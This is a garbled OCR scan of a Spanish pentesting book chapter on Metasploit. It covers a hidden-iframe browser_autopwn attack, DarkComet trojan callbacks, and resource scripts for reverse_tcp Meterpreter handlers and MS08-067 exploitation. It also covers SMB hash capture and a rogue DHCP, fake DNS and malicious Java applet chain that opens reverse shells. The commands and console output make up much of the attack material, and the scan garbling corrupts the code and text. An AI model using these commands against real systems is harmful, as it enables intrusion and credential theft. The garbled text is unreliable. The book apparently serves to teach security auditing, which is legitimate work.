Ы j > ы a Pi М ? . 1 п е га 
distribuJr malware о que también ha sido comprometido y dispone de чп kit A a pan y d y 
P i r > i 16 e ili | itio web de ua Congreso ce tecno og a, y se f 
y 1 A $ a n se ha utilizado ei 51 f 
ага hace mas real la simulació | ы. Я | | | 
n d f АП $ а vic ima Jara qu e Cl ando se introduzca la dir eccioón rea se са gl 
i i > 1 й с pe a 1 1 ^ | | t 
n oc 1 teade el archi О ho, ÍS de la , y 1 | 


Dirección vereda. com! ; 


Ea es М Maps Nolicias Shopping Стаў М ИРОНИИ 
A Аш ¡Google | Historial web | Configuración + | iniciar sesión 


Fig 3.21: Navegación de la víctima a la web hackeada. 


T ОЕА гаБајо, el módulo de 
Una vez que la víctima navega por el sitio web y el iframe oculto hace ш он “аё т 
5 | муу ; fo di ibles раѓа esa versión del navegador. Un! 
itrecibirá 1: lanzará los exploits disponibles pata "Бас 
Metasploit recibirá la petición y ие ' ТУ 
vez que Metasploit empieza a realizar este trabajo sólo queda esper ar a conseguir la a 


to- prii B HN B шше. 
Fig 3.22: Browser_Autopwn lanzando exploits, „‹ 


y K q ^ һ 
g 0 ? D | | 3 
Б 
[ , 
: 5 , 


aplicaciones en la máquina remota. 


| 148 
ieterpréter > 
Fig 3.23: Distribución de mahware. 
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Una vez la máquina ha sido troyanizada, DarkCommet se conectará con el atacante automáticamente. 


En la generación de un bot de DarkCommet se debe especificar, al menos una dirección que será 
donde se conecte el bot dando el control de la máquina. El atacante dispondrá de un nombte de 


dominio, por ejemplo un dyndns, para no utilizar las direcciones ІР dinámicas. Aunque, si el atacante 
dispone de una dirección ЇР estática también podría usarla, 


Fig 3.24: El troyano se conecta al panel de administración. 


5. Automatizando las órdenes 


Tras ver la parte de intrusión o explotación de sistemas, en la que si se consigue el éxito la 
adrenalina sube a gran velocidad, hay que pensar de nuevo en el proceso completo del test de 
intrusión. Anteriormente, se ha estudiado como la recogida de información y descubrimiento de 
servicios es algo que puede llevar bastante tiempo, pero es algo que puede ser automatizado, ya que 
generalmente, el proceso tiene más espectos de procedimental que de artístico. 


La automatización de las tareas a realizar en Metasploit es un proceso que puede ayudar al auditor a 
minimizar tiempos. Como se ha mencionado anteriormente, en un test de intrusión existe gran parte 
de procedimiento, el cual en condiciones normales es siempre igual, y una parte menor que depende 
de la experiencia o pericia del auditor, la parte más artística. 


La idea principales es conseguir reunir el máximo detalle en el workspace de la base de datos a la 


que el auditor conecte el framework. Entonces, ¿Se puede automatizar la captura del máximo de 
información? Esto es la idea de los resource scripts, cuya extensión será rc. 


Los resource scripts son tratados por el framework como templates ERB al permitir la ejecución de 
bloques de instrucciones en Ruby, desde los cuales se podrá interactuar con la API de Metasploit, 


REX. Existen algunos rc que vienen por defecto en Metasploit en la ruta ¿pentesV/exploits/ 
Jramework3/scripts/resource. 


Con los scripts que vienen por defecto con el framework se puede realizar la mayoría del trabajo 
de recopilación de información del entorno a auditar. A continuación se estudia uno de los scripts 


que vienen por defecto y que es realmente interesante y útil a la hora de descubrir servicios y de 
recolectar información. 
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I у D ] 1 4 | ғ e 
: | | : үш H l | i ión del script basic discovery. гс que se puede 

yl AY talle en la escripcl 1y: | 
En este apartado se entra en de | | С . е 
с la ruta /pentest/exploits/framework3/scripis/resource. о. |. ipt sirve у 

i тааш $ y vici i ibles utilizando nmap y 
infor э ООП unas servicios disponib Ы 

oblener información sobre maq | A E e d pa q г. À 
auxiliares algunos de los vistos anteriormente en este libro, para protocolos smb, imap, ро \ [ 
с > 


fip, etcétera. 


реке | mor izar el seripf. Hay 
A continuación, mediante el uso del comando cat <scripl.re> | more se va а е и к 
¡ue tener en cuenta que se puede personalizar en función de las necesidades editando, sim] А 
с sej 
el archivo re original mediante algún editor de textos. 


ió a vari enominada ports 

Lo primero que se puede observar en la imagen es la declaración de una variable estada З K 

ко | vicios. E itor e modificar 

á i ərvicios. El auditor puede mo 
i ; puer зе serán analizados en busca de se : 

que contiene todos los puertos qu | а о 

a rango, ampliando о disminuyendo el número. Un concepto muy interesan E = el a о 

aace las variables que se configuran en msfconsole, por ejemplo RHOSTS, | ; А 
5 . 


etcétera. g o 
Para interactuar desde el interior del script con estas variables del ту үө Ды. 
framework.datastore[ '<nombre variable> Es En el script as a a a 
comparaciones mediante el uso de condicionales if para poder verificar que ¿ 


se configuraron las variables. 


t 


MA | i jecutará л З no est 
En el caso de la variable NMAPOPTS, define las opciones con las que se ejeculará птар, 5 pad А 
с А Ре % aná . r e С ), 
declarada dicha variable en el datastore se declarará en el script con unos parámetros ро 

e 


tal y como se puede ver еп la imagen. 


і eds): 
it portscanner (change this for your ne І Е. 
ойе туздон 59,53,57 ,68,79, 80,189, 110, 111,123,135, 137, 138, 139, 143,161, 264, ңе 
43,445,500,631,991,995,12 434,1521, 1720,1723,3306, 3389, 3789, 4662, 5800, 5801, 5802, 
5 ,991,995,1241,1352,1433,1434,1521, r 8 
o #1 5993,6009,6666,8090,8080,8443, 10600, 10043,27374,27663 
П , ' + , 


і k.datastore['RHOSTS'] == nil} Е 
a pipas line(“you have to set RHOSTS globally ... exiting") 


return 


end 


А 1 {= il) 
і work.datastore[ *ММАРОРТ5'] := ni ‚ 
К pra = framework.datastore[ 'НМАРОРТ5' ] 


else 7 


#default-settings | 
pmapopts = "-PN -PO -0 -55\у 


end 


Fig 3.25: Parte de código del script basic_discovery.1c. 


Para la ejecución de módulos, tras la confi guración de variables, o a а К л 
desde el interior del script зе dispone de la sentencia run_single. с к аА и 
del framework, es decir no local al script, como por шро RI a ca о : 
<variable> <valor> ”). Para ejecutar una sentencia en 7 e $ о. о. 
lo anterior run_single(“db_nmap —v -n #(птароріз) ің /ғатеуоғк.аша, 
variables se especifican mediante el uso de #{уапаЫе}. 


if í nmap == 1) 
print_line("Module: db_nmap*) 
if (verbose == 1) 


print_line("Using Naap with the following options: -y -n Hamapopts) *iFramework 
«datastore[ *RHOSTS'])") 


| run_single("db_nmap -v -n #{nmapopts} *[framework.datastore['RHOSTS"])") 
else 


print_line("Using Nmap with the following opticas: 
tastore['RHOSTS'])") 


run_single("db_nmap -n #{nmapopts} #[frəmework. datastore['RHOSTS']}") 


-n #{nmapopts} #{framework.da 
end 
run_single{"use auxiliary/scanner/portscan/tep") 


гий singie("set PORTS #{рогїв}") 


print_line("Module: portscan/tcp") 
run_single("run -]") 
end 


n: 


A 


Fig 3.26: Ejecución de sentencias desde el interior del script, 


Existe una función en el script que verifica si el auditor se encuentra conectado a la base de datos 


> 
dónde se almacenará toda la información obtenida con el script. Si no se está conectado a la 
base de datos el script mostrará 


га un mensaje por pantalla indicándolo y se acabará la ejecución de 
instrucciones. 


# Test and see if we have 
begin 


a database connected 


framework. db.hosts | 
rescue ::ActiveRecord: :ConnectionNotEstablished 


print_error("Database connection isn't established") 
return 


епі 


Fig 3.27; Test de conexión de la base de datos en el script. 


А continuación se puede visualizar la ejecución del script y la obtención de resultados mediante 
el uso de esta técnica de automatización. Recordando su utilidad para la mayoria de los test de 
intrusión. Es altamente recomendable estudiar los distintos scripts que dispone el framework y ver 
sus posibilidades reales, ya que utilizando varios de ellos en conjunto se puede obtener gran cantidad 


de información del entorno a auditar e incluso conseguir realizar explotaciones con algunos de los 
Scripts. 


msÍ > resource basic 0ізсомегу гс 
1+] Processing /opt/framework3/msf3/scripts/reso 
[+] resource (/opt/framework3/m5T3/scripts/resou 
you have to set RHOSTS globally ... exiting 

msf > set RHOSTS 192.168.0,59 

RHOSTS => 192.168.8.59 

lusf > resource basic_discoverv. гс 

[+] Processing /opt/framework3/msf3/scripts/resource 


{*] resource (Wopt/framework3/mst3/scripts/resource/ 
THREADS => 15 


[-] Database connection isn't established 
msf > H 


urce/basic discovery. гс for ERB directives. 
ree/hasic_discevery.rc)> Ruby Code (20251 bytes) 


/basic_discovery.rc for ERB directives. | 
basic_discovery.rc)> Ruby Code (20261 bytes) 


e 


Fig 3.28: Ejecución de basic_discovery.rc con error por conexión base de datos. 
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Uno de ¿os errores más comunes es la no configuración de las variables en el framewor antes К 
lanzar el script, ya que puede que éste las requiera previamente configuradas, por otro lado, otro 
los errores comunes es la no conexión a la base de datos cuando el script lo requiere, 


msf > db connect postgres:123abc.0127.9.9,1/msf 
sf > resource basic discovery. rc 
[+] resource (basic_discovery.rc)> Ruby Code (18975 bytes) 


ms f 


= 


| 


и TNT 
PIAR 


sterting discovery scanners ... stage 1 


каныны PERIS = e mper erre eere e 
и 


starting pertscanners ... 


udp_sweep | | | 

i+} Auxiliary module running as background job 

Module: db птар 

Using Nmap with the following options: -n -sT -PO -A 192.168.0.59 


f*] Sending 10 probes to 192.168.9.59->192,168.9.59 5 hosts) 

{#] Discovered ntp оп 192.168.0,59:123 (Microsoft NTP | 

[+] Discovered netbios оп 192.168.0.55:137 (РАЧЕВАЅ -01760СС : <09>:0 Маала ат 

8СС:<29>:0 :GRUPO ТКАВАЈО: <00>:6 :GRUPO_TRABAJO: <le>:6 ¿GRUPO TRABAJO: <10>:0 ОЕ 
MSBROWSE _[ «61>:6 :08:09:27:a4:89:3d} 


[#] Nmap: Starting Nmap 5.515VN ( http: //nmap.org ) at 2012-06-25 17:25 CEST 


Pig 3.29: Ejecución correcta de basic_eiscovery.re. 


Creación de un resource script 

Antes de crear scripts de automatización de tareas se debe disponer de un par Ea cosas па la 
primera es que se debe conocer el lenguaje de scripting Ruby y la segunda que se debe disponer de 
un conocimiento medio-alto de іа arquitectura y funcionamiento de Metasploit. 


А continuación el ejemplo que se muestra es bastante sencillo e intuitivo, pero queda reflejado el 
potencial y flexibilidad que disponen los resource scripts para la automatización de tareas comunes. 
r Е . (їе e f y 1 
En el presente ejemplo se utiliza un tc para, simplemente, automatizar el proceso de configuraciót 
del manejador de conexiones de los payload, es decir, exploit/multi/handler. 

echo use exploit/multi/handler >> meterpreter.rc 

echo set PAYLOAD vindows/meterpreter/reverse_tcp >> meterpreter.ra 

echo set LHOST 192.168.0.100 >> meterpreter.rc 


echo set ExitOnsession false >> meterpreter.rc 
echo exploit -j ~z >> meterpreter.rc 


isti і ia li andos 
Para lanzar este script existen distintas maneras, como por ejemplo, en una linea de нЕ 
1. 2 н А 
ejecutar msjconsole -r meterpreterrc, o desde una sesión de ms/console mediante el comande 
resource теіеғртеѓек re. 


Otro ejemplo interesante es la automatización de la explotación de una máquina, por ejemplo, 
mediante la explotación de №508-067. 


echo use expioit/windows/smb/ms08_067_netapi >> ехр1оібМебарі. кс 
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echo set PAYLOAD windows/meterpreter/reverse tcp >> exploitNetapi.ro 
echo set RHOST 192.168.0.110 >> explioitNetap1.rc 

echo set LHOST 192.168.0.100 >> exploitNetapi.rc 

echo exploit -j -z >> exploitNetapi.rc 


Msi > resource exploitNetapi, re 
[*) Processing /opt/framework3 
resource (/opt/framework3/msf3 
667 netapi 

resource (/opt/framework3/msf3 
er/reverse_tcp 

PAYLUAD => vindows/neterpreter/reverse_tcp 
resource (/opt/frameuork3/msf3/scripts/resource/exploitNetapi. 
UHOST => 192.168.0.56 


resource (/opt/framenork3/mst3/scripts/resource/exploitNetapi. 
RHOST => 192,168.0.59 

resource l/opt/frameuork3/msf3/scripts/resource/exploitNetepi. 
[#1 Exploit running as background job. 


/msf3/scripts/resource/exploitNetapi.rc Таг ERB directives, | 
/scripts/resource/exploitNetapi.rc)> use exploit rwindows/smb/msts_ 
/scripts/resource/exploitNetapi.rc)> set PAYLCAD windows/meterpret 


| | 
reojo set LHOST 192.168.9.56 | 

і 
rc)> set RHOST 192.165.0.59 | 


rcj> exploit -j -z 


msf exploit(ms08_067_netapi) > [*) Automatically detecting the target... 
i+] Fingerprint: Windows XP - Service Pack 3 - lang:Spanish 

[+3 Selected Target: Windows XP SP3 Spanish (NX) 
[*] Attempting to trigger the vulnerability... 
1*] Sending stage (752128 bytes) to 192.168.90.59 


[*] Heterpreter session 1 opened (192.168.0.56:4444 


{*] Started reverse handler оп 192,168.8.56:4444 | 
-> 192.16@.@,59:1071) at 2012-06-25 90:18:55 


Fig 3.30: Ejecución de un resource script para М908-067. 


6. Servidores Rogue 


Metasploit dispone de unos módulos de tipo auxiliary muy interesantes que permiten al auditor 
levantar un servidor, en menos de un minuto, el cual ofrece un servicio totalmente falso. El objetivo 
de este tipo de servidores es la captura de credenciales o ejecución de código arbitrario mediante 
el engaño en la máquina remota. Los engaños pueden ir desde simples redireccionamientos 
a direcciones IP dónde en un puerto concreto espera el servicio malicioso, hasta un complejo 


entramado de servicios, que aparentemente realizan lo que deberían para terminar con la explotación 
de la máquina de la víctima. 


La ruta dónde se aloja en el framework este tipo de módulos es auxiliary/server/. En esta ruta se 
puede encontrar un directorio capture dónde se almacenan módulos cuyo objetivo principal es la 


captura de credenciales y, otros elementos de interés como las cookies. A continuación se muestra 
información sobre los módulos server/caplure. 


Descripción 


Permite configurar un servidor para protocolo SMB con el que se pueden. 
server/capture/smb l i 
obtener hashes de tipo NTLM 


—. 


Permite configurar un serv 
credenciales 


f idor FTP que presente un lo in pare тесорег 
server/capture/fip ыш. gl pe g 
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| Ў are: Descripción 
Módulo auxitiary | 


М т элде ria «¿qlac de 
Permite configurar un servidor HTTP para capturar credenciales 


servericapture/htp 


autenticación 


| server/capture! 


| pop3 Е - 


бз CASA oleg de 
i igurar un servicic ATP para capturar credenciales 
| server/capture/ | Permite configurar un servicio SM | 
| 


| smtp autenticación 


| telnet para realizar cl engaño y obtener 
| serverícapture/ | Permite configurar un servidor de telnet para realizar el engaño y 
| telnet las credenciales me 


Tabla 3.04: Módulos auxiliary/server/capiure. 


asf auxiliary(smb) > setg SRYHOST 192.168.1,35 
SRVHOST => 192.168.1,35 реи" ке 
msf ацхіііагу(ѕть) > set LOGFILE /root/hashes.txt 
LOGFILE => froot/hashes.txt 

maf auxiliaryísmb) > run | | 

i] Auxiliary module execution completed 


{*] Server started. | 
msf auxiliary(smb) > [*] 2012-06-26 ose 
NTLMY2 Response Captured from 192.168.1.36: 
BIT-PCAftsai 05: ІМ: | 

і :Disabled | е 
Ц E е NT CLIENT CHALLENGE :0181000009000000360cc6d7d653cd0l6C 
NTHASH: e Я й С 


e3f935fdfe319000000000209800090009000000000090 
ООСО 


Fig 3.31: Captura de hashes con auxiliary/server/capture/smb. 


ъ= оз A » . А . .. € 


тр 3 - dé e dispone de distintas 
Las otras herramientas interesantes son las auxiliary/server dónde se d а 
05 | ; - гап terror en la red. 
funcionalidades que, ya sea en solitario o unidas, pueden provocar gran ( 
y] 


PoC: Rogue DHCP, Fake DNS y Applet de Java 


ос iliary/server/dhep, con el 
En el siguiente ejemplo se va a realizar una prueba de concepto con о Ў A > 
sne Я К A я е onfiguraré К 
que se configurará un Rogue DHCP, auxiliary/server/fakedns, con el que ads о, е 

| : E К 

tanto especial y exploit/multi/browser/java_signed_applet con el que se rez К 
[4 
la máquina de la víctima. 


ў ireless red corporativa 
1 a red wireless o una red co 

; rio está | red, que podría ser un: отрогайм 
El escenario está compuesto por una red, O 
cableada, dónde el atacante configurará un rogue DHCP con el que н | ' у. о. 
obtengan una dirección ІР de un rango concreto, una dirección 1Р de un ү о о. 
el atacante y una dirección de puerta de enlace, que también podría ч а 

p { Afi ener i redenciales. 
por lo que se podria monitorizar el tráfico para obtener cookies o cre 
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Además se configura un servicio web dónde al realizar la conexión se lanzará un applet de javi 
con intenciones maliciosas. Este servicio será referenciado por una РА web e a " 
portal cautivo y que realmente redirigirá al servicio web dónde se lanzará el applet a 
мв н тор шө un servidor Apache que escucha peticiones en el puerte 80, а! 
legar а рене ол se muestra la página dei portal cautivo que poco después redirigirá a la dirección 
E н И dónde se encuentra configurado el servicio del applet. Cuando el usuario o víctima eh 
о se estará ejecutando un payload que devolverá una sesión inversa, 


f hol б, 
ый configuración dei HC . 
0 ША ación dei Rogue DHCP es bastante sencilla, se carga el módulo auxiliary/servertlicn y 
se configuran algunos parámelros como se puede visualizar en la siguiente tabla. | | 


eie 


Parámetro | Va | 
DHCPIPEND | 1921680105 AA 
a is нерн A | 
DICPIPSTART | 192.168.0.100 л 
A ыт ша КЕ ЭЙР ЧЛЕН АКЫ, AA А 4 
| DNSSERVER | La dirección [P donde se encuentra el DNS, por ejemplo, máquina del | 
ү б | atacante. 192.168.0.61 | | 
тера М тщ | | 
| NETMASK 255.255.255.0 и ВЕ 
а= A _  _—  _ __ __ _ _=>XAXP_PS | 
| ROUTER ¡ La dirección ЇР de la puerta de enlace, podría ser la máquina del atacante para 
EN a monitorizar tráfico. 192.168.0.61 
| SRVHOST | La dirección ІР dónde se lanza el Rogue DHCP, 192. 168.0.61 о | 
a A ш ш ы ЛА шы] 


Tabia 3.05: Configuración Rogue DHCP 


и аади Мнн . d 
SP aaa O 


nf > use auxiliary/server/dhcp E 
mst auxiliary(dhcp) > show options С 
i optiors (auxiliary/server/dhcp): 
| Мате Current Setting Required Description ` 
е 90 no Тһе broadcast address to send to 
ое по The last 1P -to give ош 
| с. no The first IP to give out . 
| e: no The DNS server ІР address 
Ж... Е по The optional filenamé of а tftp hoot 
HOSTNAME 
| оо no The optional hostname to assign 
| кок no The optional host integer counter 
e yes The netmask of the local subnet 
| АЗ no The router ЇР address 
yes The TP of the DHCP server 


57 auxiliaryldhcp) > set DHCPIPEND 1 
le iD 192,168.09. 
DHCPIPEND => 192,168.0,105 н 


{їз auxiliary(dhcp) > 


Fig 3.32: Configuración Rogue DIICP 
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Podría ser interesante agotar las direcciones IP disponibles en el poo! del DHCP original que existe 
en ta misma red, si existiese alguno. Llegado este punto, los clientes que se conecten a la red recibirán 


direcciones ІР otorgadas por el servidor DHCP false, además de lo más interesante, la dirección IP 
del servidor DNS y de la puerta de enlace que se quiera, 


Es el momento de configurar el servidor DNS falso, para ello se carga el módulo auxiliary/server/ 


fukedns. El funcionamiento de fakedns es sencillo, con la variable DOMAINBYPASS se configura 


una lista de dominios para los que las resoluciones no serán falseadas, SRVHOST es la variable 
dónde se configura la dirección ІР dónde se monta el servidor DNS falso, la del atacante en este 
caso, Tras lanzar el módulo, en el ejemplo, cuando la víctima pida resolver cualquier nombre de 
dominio, excepto Google porque así está configurado, se resolverá con la dirección ЇР del atacante 
dónde espera el servidor Apache. 


msi auxiliary(dncp! > run 
[+] Auxiliary iwdule execution compieted 


[+] Starting DHCP server... 
msf auxiliary(dhcn) > use auxiliary/server/fakedaos 
met auxiliaryífakedas) > show opticns 


Module options (auxiliory/server/fakedns): 


Name Current Setting Required Description 


SRYHOST 1.0.6.0 yes The local host to listen on. 
SRVPORT 53 yes The local port to listen on. 


| DOMAINBYPASS www.google.com yes The list of domain names we want to fully resolve 
| 
The address that all names should resolve to 


TARGETIOST по 


msf auxiliarylfakedns) > set 5КУН05Т 192.168.90.61 
¡RVHOST => 192,168.0.61 

msÍ auxiliaryifokredns) > run 

[+] Auxiliary module execution completed 


{*] DNS server initializing 
[ж] DNS server started 


Fig 3.33: Configuración de fakedas. 


Una de las víctimas, la cual obtuvo las direcciones ІР por el DHCP falso, realiza una petición a www. 
apple.com. El servidor DNS falso resuelve esta petición devolviendo la dirección ЇР de la máquina 
del atacante, 192.168.0.61. La máquina de la víctima, realiza la petición al atacante al puerto 80, 
dónde se encuentra un archivo index.html con el siguiente código: 


<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 3.2//EN"> 
<HTML> 
<HEAD> 

<TITLE>Captive Portal</TITLE> 
</HEAD> 
<BODY> 

Captive PortaJ<br /> 

<script type="text/javascript”“>window.location 
portal” </script> <!-- Arbitrary Redirect --> 
</BODY> 
</HTML> 


= “http: //www.apple.com:8080/ 
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El módulo « j 
del applet de java se configura con los valores que se especifican en la siguiente tabla 


Parámetro 
SRVHOST 
SRVPORT 
ОКІРАТН 
PAYLOAD 


ПИЛЕ Valor 


192.168.0.61 (IP atacante) 
те ЖИ o A 
8080 (puerto escucha servicio) r 


/portal 
Е 


Tabla 3.06: Configuración módulo «ppier de java. 
е зог: 1 evi аг iti 1 iÓ CIS j 0 е 1 1 © du о 
ы L 1 ta er y ii 

? 


es recomendable utilizar SET voci Я 
e на TA SET, social engineering toolkit, y poder utilizar alguna página web falsa 
as creible el ataque. SET será estudiado más adelante en el libro. КЕ 


j Г] үз > 1 
msf auxiliary(fakedos) > use exploit/multi/browser/java signed applet | 


msf exploit(java_signed applet) > show options 


Module options (exploit/multi/browser/java signed applet): 


к Current Setting Required Description 
APPL itekoader yes Тыр, 
a e yes The main applet's class name, 
үа и Inc. ds те CN= value for the certificate, 
{ ге | ш даш The local host to listen on. This must be an address o 
RVPORT 
ч к. yes The local port to listen on. 
= E к OS SSL for incoming connections 
йы у ia pecify the version of SSL that should be used (accept 
URIPATH no 


The URI to use for this exploit (default is random) 


Fig 3.34: Configuración exploitmudtilbrowser/java signed applet. 


La redirecció f i i 
оп de la web del portal cautivo hacia el servicio web montado por el mádulo de 


в 


e 
ji ) А 


‚ Nombres Steloader -7 no 


` Editori. DESCONOCIDO 7С; 


De, Варціниньаррів сову o 


a | Ejecutar Ml Cancelar ] 


Fig 3.35: Cuadro de diálogo applet. 
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+} Building statically signed jar for 192.168.8.183 
[+] Sending SiteLoader.jar to 192.168.0.193:1368. Waiting Тог user to click 'ассерї'... 


[+] Sending stage (749056 bytes) to 192.168,0.183 
+] Meterpreter session 1 opened (192.168.0.61:4444 -> 192,168.0.103:1370) at 2012-06-25 18:41:4 


+02068 


asf ехріоії! јама ѕідпей аррфеї) > sessions -l 


Active sessions І 
| 
{ 


EA 
Id Type Information Connection 
| 1 meterpreter x86/win32 192.168.0,61:4444 -> 192,168.0.103:13/0 | | 


Fig 3.36: Obtención sesión inversa del appler. 


а! г $ 
Fake DNS por José Selvi 

José Selvi es uno de los grandes especialistas en pentesting a nivel nacional, mentor de Incident 
Handling y Penetration Testing del SANS Institute en España. El escribe sus grandes conocimientos 


en su blog Pentesteres, el cual se recomienda su lectura desde este libro. 


FakeDNS ha sido muy utilizado por José en sus auditorías y propuso una mejora a este módulo, 
la cual realmente se ve reflejada en 2 aspectos, la lógica y su eficiencia. José se ha declarado un 
enamorado de Metasploit, debido a su flexibilidad y potencial. FakeDNS se encuentra en la ruta / 
pentest/exploits/framework3/modules/auxiliary/server/fakedas.rb. 


En la prueba de concepto anterior se ha podido estudiar como FakeDNS utiliza ила lógica inversa 
a lo común, es decir, se resuelven todos los nombres de dominio de manera falsa, excepto una lista 
que se indica. Es por esto que José planteó una nueva solución al módulo, lo logico sería utilizar 
el módulo /akeDNS para que resolviera todo correctamente, como haría un DNS, y que el auditor 


eligiese que dominio se spoofea. 


En su artículo htip://vwwwpentester.es/2012/03/mejorando-fakedns-i.himl, José habla de como 
funciona FakeDNS y como él ha mejorado este módulo. El código original se puede visualizar a 


continuación. 


{ Identify potential domain exceptions 
domain bypass_list.each do [ех | 
if (name.to_s <=> ex) == 
# Resolve the exception domain 
ір = Resolv: :DNS.new() .getaddress (name) .to_s 


answer = Resolv: : DNS: :Resource::IN::A.new( ip ) 


if (6109 console) 
print _status("DNS bypass domain found: #{ex}”) 


print_status (“DNS bypass domain #{ex} resolved t{ip}”) 
end 
end 
` end 
request.add answer (паме, 60, answer) 
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Еп el código existe un punto еп que se recorre la lista de dominios que deben ser saltados a la hora de 
falsear la respuesta DNS. Mediante el bucle que se ve en el código se compara la petición DNS con 
los elementos de la lista DOMAINBYPASS, si alguno son iguales entonces se realiza una resolución 


normal, mientras que si tras recorrer la lista y comparar los elementos no se ha encontrado nin guno 
igual se envía la respuesta Jake. 


SI se requiere cambiar el comportamiento del DNS se podría pensar en una solución rápida como es 
шой саг el primer рог la siguiente línea if (name.to_s <=> ex) 1= 0, Con esta solución, cuando 
el nombre solicitado se encuentre en la lista se resolverá con fake y cuando no lo esté funcionará 
normal. Sólo tiene una limitación y es que en la variable DOMAINBYPASS sólo se podrá configurar 
пп nombre de dominio, y no más. 


La solución anterior puede ayudar en un momento dado de una auditoría, pero cuando se le introduce 
un nombre de dominio que по existe, el módulo deja de funcionar y se rompe, Para solucionar esto 
problema, se debe añadir un control de excepciones en la zona de código en la que se realiza el 
procesa de resolución. 
begin 

ip = Resolv: :DNS.new() .getaddress (name) .to_s 

answer = Resolv: : DNS: :Resource::IN::A.new! ір ) 
rescue ::Exception => e 

next 
end 


Con el control implementado se evita que cuando se intente resolver un nombre de dominio que ло 
existe el módulo se rompa. Pero, según José, sigue siendo una solución un tanto especial, aunque sí 
es funcional. 


Para finalizar con una solución elegante y eficiente, José Selvi implementó su propia versión de 
FakeDNS a la que denominó BestFakeDNS, la cual se puede descargar desde el siguiente enlace 
http:/Mools.pentester.es/fakedns. Esta versión está basada en la original del Jramework, pero se han 
añadido funcionalidades interesantes: | 


La variable TARGETACTION con la que se evita modificar a mano el código y permite 
trabajar con la lógica original o la lógica modificada, Este parámetro se puede definir como 
BYPASS, el DNS resolverá todo excepto lo que se quiera spofear, б FAKE, el cual falseará 
todas las peticiones menos las especificadas en la lista DOMAINBYPASS. 


- Control de errores el cual evita que la aplicación caiga ante la petición de un nombre de 
dominio que no existe. i 


- Lista múltiple que permite configurar varios nombres de dominio en la lista, tanto en 
modo BYPASS como en modo FAKE. 


- Wildeard. Se puede definir nombres de dominio соп wildcards, por ejemplo 
* informatica64.com. 
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7. Personalización y actualización del framework 


Una característica interesante de Metasploit es la flexibilidad y facilidad de actualización del 
iramework. Los usuarios saben que la seguridad informática es una de las ramas que más avanza, 
ya que prácticamente a diario salen gran cantidad de vulnerabilidades conocidas. Es рот ue 
el auditor debe disponer de su framework lo más actualizado posible y al día, para que en los test 
de intrusión que haga uso de Metasploit éste pueda sacar el máximo provecho de los sistemas 
informáticos a los que se enfrenta, 


Metasploit proporciona un mecanismo de actualización automático mediante el uso del comando 
msfupdate. Este mecanismo conecta con los servidores de Metasploit a пе de la URL е 
metasploit.com y se realiza una consulta del estado de la base de datos local, veri ficando en qué estado 
se encuentra y si existen nuevos exploits, payloads, encoders, etcétera. Si existen actualizaciones se 
procede a la descarga de todas ellas, este proceso puede consumir gran cantidad de tiempo. 


rootabt:-+ mstupdate 
+] 

{+} Attempting to update the Metasploit Framework... 
Г) i 


-H : metasploit. сот 
- к e Tue. 16 Mar 2010 12:69:59 GMT until Моп, 91 Apr 2013 22:02:24 GMT ` aa 
~ Issuer: 67969287, http://certificates.gudaddy.com/repository, SoDaddy.com, Inc., Scottsdale, 
o da: l6:ad:cb:4c:6f:7d:c1:b7:70:5e:e5:19:97:01:8b:39:22:6a:92 
(А)ејесї, accept (t)emporarily or accept (p)ermanently? Po 
A external/source/javapayload/src/metasploit/RMiPayload. java 
А external/source/javapayload/src/metasploit/AESEncryption. java 
A external /suurce/javapayload/src/metasploit/PayloadTrustManager. java 
u external/source/javapayload/src/metasploit/Payload. java 
A external/source/favapayload/src/metasploit/RMlLoader. java 
А  external/source/javapayload/src/rmi 
А external/source/javapayload/src/rmi/RMiCaptureserver. java 


Fig 3.37: Actualización automática con msfupdate, 


Como se ha mencionado anteriormente en este libro, existe un gran problema con las actualizaciones 
automáticas y es que se pierde el control sobre lo que se está realizando en el framework, Por 
ejemplo, si actualmente se actualiza Metasploit, en su versión шше, se perderá la funcionalidad 
artopwn y no podrá ser utilizada por el auditor en el test de intrusión. Es por esto, que en muchas 
ocasiones se recomienda el uso de la actualización manual y de manera controlada, Además, en el 
proceso de actualización también se descargan archivos para mejorar la estabilidad del framework. 


- Actualización controlada de recursos 


Añadir exploits u otras funcionalidades a Metasploit es realmente sencillo si se conoce su estructura, 
Como se ha mencionado anteriormente en el libro, Metasploit dispone de una serie de directorios 
organizados dónde se recogen los exploits, encoders, payloads, herramientas е сото pueden 
ser los escáneres, etcétera, Para añadir un exploit que se haya descargado de Internet, simplemente 
hay que añadir el fichero con extensión rb, Ruby, en la carpeta exploit que se encuentra en la ruta / 
pentest/exploits/framework3/modules. Como nota añadir, que los exploits que se descarguen deben 
estar escritos para Metasploit. 
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Una vez se disponga de esto claro, el auditor puede personalizar su entorno y sus rutas dónde 
encontrar sus exploits a su antojo. Por ejemplo, si el auditor quiere una carpeta denominada 
MisExploits que contenga todos los exploits que él requiera, una buena práctica sería crear esta 
carpeta en la ruta Jpentest/exploits/framework3/modules/exploits, de esta manera cuando el auditor 
quiera acceder desde msfconsole al contenido de ese directorio, simplemente deberá ejecutar use 
exploit/MisExploits y elegir el fichero que se requiera cargar o utilizar. 

Para el resto de componentes y módulos este proceso es similar y puede ser llevado a cabo de 
manera análoga. 


Ejemplo: Descarga de exploit y adición al framework 

ara el siguiente ejemplo se descargará un exploit del sitio web hitp:/exploit-db.com, que se 
encuentre escrito en Ruby y preparado para Metasploit. Después, se copiará el exploit а la carpeta 
dónde se quiera dejar éste y poder cargarlo con el framework. 


En primer lugar se accede al sitio web y se busca el exploit requerido, se puede hacer uso del buscador 
que viene incorporado en el sitio a través de su URL http: /Mwww.exploit-db.com/search. Una vez se 
localice el exploit requerido para llevar a cabo еї proceso de explotación se debe descargar al equipo, 
en principio sobre cualquier ruta. Hay que tener en cuenta que el exploit está preparado para ser 
utilizado por el framework. 


i] Adobe Flash Player AVM Ve х Y j 
€ > a | | wwnw.exploit-db.com/exploits/19295/ 
PR A 


СУЕ: 2011-2110 OSVDB-1D: 48268 |" 


| Author. metasploit Published: 2012-06-20 Verified: $ 


е; 
{ EDB-ID: 19295 


# This file is part of the Hetasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Hetasploit 
# меб site for more information on licensing and terms of use, 

t http://metasploit.com/ 

йв 


require ‘msf/core' 


class Hetasploit3 < Msf;:Explolt: ¿Remote 
Rank = GreatRanking 


include Msf::Exploit: :Remote: :HttpServer: :HTAL 


def initialize(info = ()) 
super(update_ info(info, 
"Name* => "Adobe Flash Player АУМ Verification Logic Array indexing Code Execution”, 
“Description” => al 
